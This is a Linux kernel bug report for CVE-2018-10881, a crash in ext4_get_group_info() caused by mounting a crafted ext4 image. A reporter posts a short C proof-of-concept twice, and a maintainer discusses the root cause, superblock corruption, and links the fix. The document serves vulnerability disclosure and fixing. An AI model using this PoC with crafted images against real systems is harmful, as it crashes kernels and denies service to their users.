Bug 200015
Summary: | BUG() triggered in ext4_get_group_info() when mounting and operating a crafted ext4 image | ||
---|---|---|---|
Product: | File System | Reporter: | Wen Xu (wen.xu) |
Component: | ext4 | Assignee: | fs_ext4 (fs_ext4) |
Status: | RESOLVED CODE_FIX | ||
Severity: | normal | CC: | tytso, wen.xu |
Priority: | P1 | ||
Hardware: | All | ||
OS: | Linux | ||
Kernel Version: | 4.17 | Subsystem: | |
Regression: | No | Bisected commit-id: | |
Attachments: |
The (compressed) crafted image which causes crash
Simplified image |
Description
Wen Xu
2018-06-10 01:18:26 UTC
More simple POC: #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> static void activity(char *mpoint) { char *foo_bar_baz; int err; static int buf[8192]; memset(buf, 0, sizeof(buf)); err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint); int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777); if (fd >= 0) { write(fd, (char *)buf, 517); write(fd, (char *)buf, sizeof(buf)); close(fd); } fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777); if (fd >= 0) { write(fd, (char *)buf, sizeof(buf)); close(fd); } } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } Thanks for the simplified POC. But unfortunately that doesn't really tell me anything new. What I need is a simplified POC *image*. I can add a simplistic check to see if we get a negative group number in ext4_discard_preallocations(), but that's not the real root cause. And it wouldn't be a complete solution, since we would have add gazillions of checks anywhere we use s_first_data_block. It's much better if we can check s_first_data_block at mount time (which we do), and then make sure that it can't get corrupted afterwards. So the real root cause is somehow, the superblock buffer has gotten corrupted. We have a lot of checks to prevent this from happening --- that's what the ext4_data_block_valid() function in fs/ext4/block_validity.c is all about --- but obviously, we're missing a check somewhere. The question is where. If we had a simplified POC image, I could look to find the file system corruption that was causing the superblock to get trashed. The problem is that there are so many random corruptions, many of them completely irrelevant to the bug at hand, that this is extremely difficult. (In reply to Theodore Tso from comment #2) > Thanks for the simplified POC. But unfortunately that doesn't really tell > me anything new. What I need is a simplified POC *image*. > > I can add a simplistic check to see if we get a negative group number in > ext4_discard_preallocations(), but that's not the real root cause. And it > wouldn't be a complete solution, since we would have add gazillions of > checks anywhere we use s_first_data_block. It's much better if we can > check s_first_data_block at mount time (which we do), and then make sure > that it can't get corrupted afterwards. > > So the real root cause is somehow, the superblock buffer has gotten > corrupted. We have a lot of checks to prevent this from happening --- > that's what the ext4_data_block_valid() function in fs/ext4/block_validity.c > is all about --- but obviously, we're missing a check somewhere. The > question is where. If we had a simplified POC image, I could look to find > the file system corruption that was causing the superblock to get trashed. > The problem is that there are so many random corruptions, many of them > completely irrelevant to the bug at hand, that this is extremely difficult. Yeah, I know. I will spend some time to make a simplified POC image for you :) Created attachment 276563 [details]
Simplified image
Hi Ted,
You can still use this POC:
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/falloc.h>
#include <linux/loop.h>
static void activity(char *mpoint) {
char *foo_bar_baz;
int err;
static int buf[8192];
memset(buf, 0, sizeof(buf));
err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint);
int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
if (fd >= 0) {
write(fd, (char *)buf, 517);
write(fd, (char *)buf, sizeof(buf));
close(fd);
}
fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
if (fd >= 0) {
write(fd, (char *)buf, sizeof(buf));
close(fd);
}
}
int main(int argc, char *argv[]) {
activity(argv[1]);
return 0;
}
When I am testing, sometimes umount is required.
Thanks,
Wen
Thanks Wen for your help in tracking down the problem. The fix is here: http://patchwork.ozlabs.org/patch/929792/ This has been assigned CVE-2018-10881 Red Hat Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=1596828 |